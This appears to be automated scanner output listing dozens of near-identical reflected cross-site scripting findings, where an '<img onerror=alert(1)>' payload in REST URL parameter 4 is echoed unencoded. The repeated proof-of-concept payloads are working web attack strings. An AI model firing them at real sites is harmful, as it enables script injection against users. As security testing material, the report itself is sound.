This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e8804<img%20src%3da%20onerror%3dalert(1)>67595dbea58 was submitted in the REST URL parameter 4. This input was echoed as e8804<img src=a onerror=alert(1)>67595dbea58 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 79048<img%20src%3da%20onerror%3dalert(1)>749ccefca97 was submitted in the REST URL parameter 4. This input was echoed as 79048<img src=a onerror=alert(1)>749ccefca97 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ecb0e<img%20src%3da%20onerror%3dalert(1)>6e752a7b23e was submitted in the REST URL parameter 4. This input was echoed as ecb0e<img src=a onerror=alert(1)>6e752a7b23e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f991d<img%20src%3da%20onerror%3dalert(1)>ef4f0d284ae was submitted in the REST URL parameter 4. This input was echoed as f991d<img src=a onerror=alert(1)>ef4f0d284ae in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cf79c<img%20src%3da%20onerror%3dalert(1)>98a86016311 was submitted in the REST URL parameter 4. This input was echoed as cf79c<img src=a onerror=alert(1)>98a86016311 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload bb496<img%20src%3da%20onerror%3dalert(1)>b68810f499d was submitted in the REST URL parameter 4. This input was echoed as bb496<img src=a onerror=alert(1)>b68810f499d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ebf0a<img%20src%3da%20onerror%3dalert(1)>215758b8353 was submitted in the REST URL parameter 4. This input was echoed as ebf0a<img src=a onerror=alert(1)>215758b8353 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 279ba<img%20src%3da%20onerror%3dalert(1)>f05e9a6a80c was submitted in the REST URL parameter 4. This input was echoed as 279ba<img src=a onerror=alert(1)>f05e9a6a80c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload bc6a6<img%20src%3da%20onerror%3dalert(1)>4a4a7d81d25 was submitted in the REST URL parameter 4. This input was echoed as bc6a6<img src=a onerror=alert(1)>4a4a7d81d25 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload bc3da<img%20src%3da%20onerror%3dalert(1)>ab65d9a1107 was submitted in the REST URL parameter 4. This input was echoed as bc3da<img src=a onerror=alert(1)>ab65d9a1107 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 432c1<img%20src%3da%20onerror%3dalert(1)>8ef55fb9c1d was submitted in the REST URL parameter 4. This input was echoed as 432c1<img src=a onerror=alert(1)>8ef55fb9c1d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 278a0<img%20src%3da%20onerror%3dalert(1)>88b38d4e150 was submitted in the REST URL parameter 4. This input was echoed as 278a0<img src=a onerror=alert(1)>88b38d4e150 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1ecaf<img%20src%3da%20onerror%3dalert(1)>288b53e1a07 was submitted in the REST URL parameter 4. This input was echoed as 1ecaf<img src=a onerror=alert(1)>288b53e1a07 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 905c2<img%20src%3da%20onerror%3dalert(1)>a7b33374ab3 was submitted in the REST URL parameter 4. This input was echoed as 905c2<img src=a onerror=alert(1)>a7b33374ab3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d1f38<img%20src%3da%20onerror%3dalert(1)>0d292e7660b was submitted in the REST URL parameter 4. This input was echoed as d1f38<img src=a onerror=alert(1)>0d292e7660b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ca3ba<img%20src%3da%20onerror%3dalert(1)>4586f56f06c was submitted in the REST URL parameter 4. This input was echoed as ca3ba<img src=a onerror=alert(1)>4586f56f06c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f5e01<img%20src%3da%20onerror%3dalert(1)>1dcdc06a97c was submitted in the REST URL parameter 4. This input was echoed as f5e01<img src=a onerror=alert(1)>1dcdc06a97c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 744d4<img%20src%3da%20onerror%3dalert(1)>006768113df was submitted in the REST URL parameter 4. This input was echoed as 744d4<img src=a onerror=alert(1)>006768113df in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a27e4<img%20src%3da%20onerror%3dalert(1)>0524341e47f was submitted in the REST URL parameter 4. This input was echoed as a27e4<img src=a onerror=alert(1)>0524341e47f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f5e6e<img%20src%3da%20onerror%3dalert(1)>e76187f4ae1 was submitted in the REST URL parameter 4. This input was echoed as f5e6e<img src=a onerror=alert(1)>e76187f4ae1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload edcd6<img%20src%3da%20onerror%3dalert(1)>7a54908e509 was submitted in the REST URL parameter 4. This input was echoed as edcd6<img src=a onerror=alert(1)>7a54908e509 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 48ebc<img%20src%3da%20onerror%3dalert(1)>5d2a27851a8 was submitted in the REST URL parameter 4. This input was echoed as 48ebc<img src=a onerror=alert(1)>5d2a27851a8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9fd08<img%20src%3da%20onerror%3dalert(1)>c0013a8d41f was submitted in the REST URL parameter 4. This input was echoed as 9fd08<img src=a onerror=alert(1)>c0013a8d41f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 11c3f<img%20src%3da%20onerror%3dalert(1)>5ce85863144 was submitted in the REST URL parameter 4. This input was echoed as 11c3f<img src=a onerror=alert(1)>5ce85863144 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2ea1b<img%20src%3da%20onerror%3dalert(1)>d25a73a3da6 was submitted in the REST URL parameter 4. This input was echoed as 2ea1b<img src=a onerror=alert(1)>d25a73a3da6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e84a7<img%20src%3da%20onerror%3dalert(1)>970d3c015fe was submitted in the REST URL parameter 4. This input was echoed as e84a7<img src=a onerror=alert(1)>970d3c015fe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ddf3c<img%20src%3da%20onerror%3dalert(1)>5d5e2808b3a was submitted in the REST URL parameter 4. This input was echoed as ddf3c<img src=a onerror=alert(1)>5d5e2808b3a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3e3d3<img%20src%3da%20onerror%3dalert(1)>8202863975f was submitted in the REST URL parameter 4. This input was echoed as 3e3d3<img src=a onerror=alert(1)>8202863975f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f8094<img%20src%3da%20onerror%3dalert(1)>da63b1adfaf was submitted in the REST URL parameter 4. This input was echoed as f8094<img src=a onerror=alert(1)>da63b1adfaf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d64c9<img%20src%3da%20onerror%3dalert(1)>0d594fd3396 was submitted in the REST URL parameter 4. This input was echoed as d64c9<img src=a onerror=alert(1)>0d594fd3396 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 343d7<img%20src%3da%20onerror%3dalert(1)>dbbe95a5ea3 was submitted in the REST URL parameter 4. This input was echoed as 343d7<img src=a onerror=alert(1)>dbbe95a5ea3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload eca8c<img%20src%3da%20onerror%3dalert(1)>96263e8f755 was submitted in the REST URL parameter 4. This input was echoed as eca8c<img src=a onerror=alert(1)>96263e8f755 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cbf6a<img%20src%3da%20onerror%3dalert(1)>6cbaf6bbc19 was submitted in the REST URL parameter 4. This input was echoed as cbf6a<img src=a onerror=alert(1)>6cbaf6bbc19 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 53156<img%20src%3da%20onerror%3dalert(1)>1ede4f59a85 was submitted in the REST URL parameter 4. This input was echoed as 53156<img src=a onerror=alert(1)>1ede4f59a85 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d44c8<img%20src%3da%20onerror%3dalert(1)>f4e2e92266 was submitted in the REST URL parameter 4. This input was echoed as d44c8<img src=a onerror=alert(1)>f4e2e92266 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ced2e<img%20src%3da%20onerror%3dalert(1)>50ade7bf351 was submitted in the REST URL parameter 4. This input was echoed as ced2e<img src=a onerror=alert(1)>50ade7bf351 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 61996<img%20src%3da%20onerror%3dalert(1)>a6903d9492e was submitted in the REST URL parameter 4. This input was echoed as 61996<img src=a onerror=alert(1)>a6903d9492e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ebcbd<img%20src%3da%20onerror%3dalert(1)>66693aacae0 was submitted in the REST URL parameter 4. This input was echoed as ebcbd<img src=a onerror=alert(1)>66693aacae0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e7088<img%20src%3da%20onerror%3dalert(1)>9d68a8ca440 was submitted in the REST URL parameter 4. This input was echoed as e7088<img src=a onerror=alert(1)>9d68a8ca440 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b792c<img%20src%3da%20onerror%3dalert(1)>c708b5b3f36 was submitted in the REST URL parameter 4. This input was echoed as b792c<img src=a onerror=alert(1)>c708b5b3f36 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 30611<img%20src%3da%20onerror%3dalert(1)>09d6acce984 was submitted in the REST URL parameter 4. This input was echoed as 30611<img src=a onerror=alert(1)>09d6acce984 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6107d<img%20src%3da%20onerror%3dalert(1)>e624fee1427 was submitted in the REST URL parameter 4. This input was echoed as 6107d<img src=a onerror=alert(1)>e624fee1427 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3f5bb<img%20src%3da%20onerror%3dalert(1)>a491f4508bc was submitted in the REST URL parameter 4. This input was echoed as 3f5bb<img src=a onerror=alert(1)>a491f4508bc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7a1c3<img%20src%3da%20onerror%3dalert(1)>6af960c4dea was submitted in the REST URL parameter 4. This input was echoed as 7a1c3<img src=a onerror=alert(1)>6af960c4dea in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a75b5<img%20src%3da%20onerror%3dalert(1)>0581d48490f was submitted in the REST URL parameter 4. This input was echoed as a75b5<img src=a onerror=alert(1)>0581d48490f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 48a06<img%20src%3da%20onerror%3dalert(1)>08df469c4e0 was submitted in the REST URL parameter 4. This input was echoed as 48a06<img src=a onerror=alert(1)>08df469c4e0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3c7e2<img%20src%3da%20onerror%3dalert(1)>7e69ac8974 was submitted in the REST URL parameter 4. This input was echoed as 3c7e2<img src=a onerror=alert(1)>7e69ac8974 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload aa815<img%20src%3da%20onerror%3dalert(1)>53559da58d7 was submitted in the REST URL parameter 4. This input was echoed as aa815<img src=a onerror=alert(1)>53559da58d7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e7502<img%20src%3da%20onerror%3dalert(1)>07e6cff3556 was submitted in the REST URL parameter 4. This input was echoed as e7502<img src=a onerror=alert(1)>07e6cff3556 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 65aeb<img%20src%3da%20onerror%3dalert(1)>0fc86ecbee1 was submitted in the REST URL parameter 4. This input was echoed as 65aeb<img src=a onerror=alert(1)>0fc86ecbee1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 985a8<img%20src%3da%20onerror%3dalert(1)>e780e45a551 was submitted in the REST URL parameter 4. This input was echoed as 985a8<img src=a onerror=alert(1)>e780e45a551 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f6019<img%20src%3da%20onerror%3dalert(1)>b1a0c8122d5 was submitted in the REST URL parameter 4. This input was echoed as f6019<img src=a onerror=alert(1)>b1a0c8122d5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 77a6a<img%20src%3da%20onerror%3dalert(1)>0e187afc1a3 was submitted in the REST URL parameter 4. This input was echoed as 77a6a<img src=a onerror=alert(1)>0e187afc1a3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 52c6b<img%20src%3da%20onerror%3dalert(1)>7e246c89ffb was submitted in the REST URL parameter 4. This input was echoed as 52c6b<img src=a onerror=alert(1)>7e246c89ffb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8c474<img%20src%3da%20onerror%3dalert(1)>6ecf10dfb31 was submitted in the REST URL parameter 4. This input was echoed as 8c474<img src=a onerror=alert(1)>6ecf10dfb31 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 790d9<img%20src%3da%20onerror%3dalert(1)>6d991b1fd4a was submitted in the REST URL parameter 4. This input was echoed as 790d9<img src=a onerror=alert(1)>6d991b1fd4a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 626be<img%20src%3da%20onerror%3dalert(1)>47c850577d4 was submitted in the REST URL parameter 4. This input was echoed as 626be<img src=a onerror=alert(1)>47c850577d4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ad2b5<img%20src%3da%20onerror%3dalert(1)>17205cea70a was submitted in the REST URL parameter 4. This input was echoed as ad2b5<img src=a onerror=alert(1)>17205cea70a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9b2fe<img%20src%3da%20onerror%3dalert(1)>b6120455008 was submitted in the REST URL parameter 4. This input was echoed as 9b2fe<img src=a onerror=alert(1)>b6120455008 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 52787<img%20src%3da%20onerror%3dalert(1)>d1e2b34e36a was submitted in the REST URL parameter 4. This input was echoed as 52787<img src=a onerror=alert(1)>d1e2b34e36a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload bdbd8<img%20src%3da%20onerror%3dalert(1)>91425f070a7 was submitted in the REST URL parameter 4. This input was echoed as bdbd8<img src=a onerror=alert(1)>91425f070a7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b9971<img%20src%3da%20onerror%3dalert(1)>788fd8aed58 was submitted in the REST URL parameter 4. This input was echoed as b9971<img src=a onerror=alert(1)>788fd8aed58 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7c120<img%20src%3da%20onerror%3dalert(1)>cbc595904a1 was submitted in the REST URL parameter 4. This input was echoed as 7c120<img src=a onerror=alert(1)>cbc595904a1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f8496<img%20src%3da%20onerror%3dalert(1)>8febe2ef8cb was submitted in the REST URL parameter 4. This input was echoed as f8496<img src=a onerror=alert(1)>8febe2ef8cb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a31a2<img%20src%3da%20onerror%3dalert(1)>2d612f92168 was submitted in the REST URL parameter 4. This input was echoed as a31a2<img src=a onerror=alert(1)>2d612f92168 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8189d<img%20src%3da%20onerror%3dalert(1)>c965a8f7656 was submitted in the REST URL parameter 4. This input was echoed as 8189d<img src=a onerror=alert(1)>c965a8f7656 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a4224<img%20src%3da%20onerror%3dalert(1)>8c9adb198c2 was submitted in the REST URL parameter 4. This input was echoed as a4224<img src=a onerror=alert(1)>8c9adb198c2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 31850<img%20src%3da%20onerror%3dalert(1)>eae6ae15ce0 was submitted in the REST URL parameter 4. This input was echoed as 31850<img src=a onerror=alert(1)>eae6ae15ce0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f8459<img%20src%3da%20onerror%3dalert(1)>90c27eff998 was submitted in the REST URL parameter 4. This input was echoed as f8459<img src=a onerror=alert(1)>90c27eff998 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cac81<img%20src%3da%20onerror%3dalert(1)>08938a5b728 was submitted in the REST URL parameter 4. This input was echoed as cac81<img src=a onerror=alert(1)>08938a5b728 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 37c75<img%20src%3da%20onerror%3dalert(1)>443dd332700 was submitted in the REST URL parameter 4. This input was echoed as 37c75<img src=a onerror=alert(1)>443dd332700 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e07ae<img%20src%3da%20onerror%3dalert(1)>d9f394bfcc3 was submitted in the REST URL parameter 4. This input was echoed as e07ae<img src=a onerror=alert(1)>d9f394bfcc3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9d38b<img%20src%3da%20onerror%3dalert(1)>cf31d8f5e51 was submitted in the REST URL parameter 4. This input was echoed as 9d38b<img src=a onerror=alert(1)>cf31d8f5e51 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 87dd2<img%20src%3da%20onerror%3dalert(1)>72dc6b7d378 was submitted in the REST URL parameter 4. This input was echoed as 87dd2<img src=a onerror=alert(1)>72dc6b7d378 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload df4f1<img%20src%3da%20onerror%3dalert(1)>8d0a9d52acf was submitted in the REST URL parameter 4. This input was echoed as df4f1<img src=a onerror=alert(1)>8d0a9d52acf in the application's response.
